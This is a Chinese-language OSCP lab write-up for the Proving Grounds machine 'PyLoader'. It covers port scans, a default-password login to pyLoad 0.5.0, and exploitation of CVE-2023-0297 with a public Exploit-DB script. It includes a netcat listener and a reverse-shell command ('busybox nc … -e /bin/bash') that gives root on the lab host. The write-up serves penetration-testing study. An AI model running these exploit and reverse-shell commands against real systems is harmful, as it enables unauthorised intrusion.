OSCP PyLoader Write-up

一、靶场详情

靶场名称：

PyLoader

靶场地址：

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界，获取管理员旗帜：

PyLoad 弱口令 –> 后台得知应用版本信息 –> PyLoad 远程代码执行漏洞 –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描：

sudo nmap -p- 192.168.190.26 --min-rate=2000

PORT     STATE SERVICE
22/tcp   open  ssh
9666/tcp open  zoomcp

UDP 端口扫描：未发现有价值信息。

TCP 服务信息搜集：

sudo nmap -p22,9666 -sCV 192.168.190.26

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
9666/tcp open  http    CherryPy wsgiserver
|_http-server-header: Cheroot/8.6.0
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Login - pyLoad
|_Requested resource was /login?next=http://192.168.190.26:9666/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境，开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 PyLoad 远程代码执行漏洞（CVE-2023-0297）

访问靶机 HTTP 9666 端口，发现系统部署了 PyLoad 应用，使用应用初始化密码可登录后台，通过后台版本信息得知应用为：PyLoad 0.5.0。

pyload/pyload

搜索引擎 PyLoad 0.5.0 exploit，发现历史存在远程代码执行漏洞（CVE-2023-0297）。

参考链接：

https://www.exploit-db.com/exploits/51532

使用参考链接漏洞利用脚本，获取到系统 root 用户反弹 shell。

nc -lvnp 1234
python3.9 51532.py -u http://192.168.190.26:9666/ -c 'busybox nc 192.168.45.221 1234 -e /bin/bash'

升级为交互式 shell。

3.2.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流，欢迎点击「关于我」，通过页面中的微信公众号、邮箱或 Discord 与我联系；若您发现文章中存在任何错误或不足之处，也非常欢迎通过以上方式指出，在此一并致以衷心的感谢。 😊🫡

最后，祝您生活愉快！🌞✨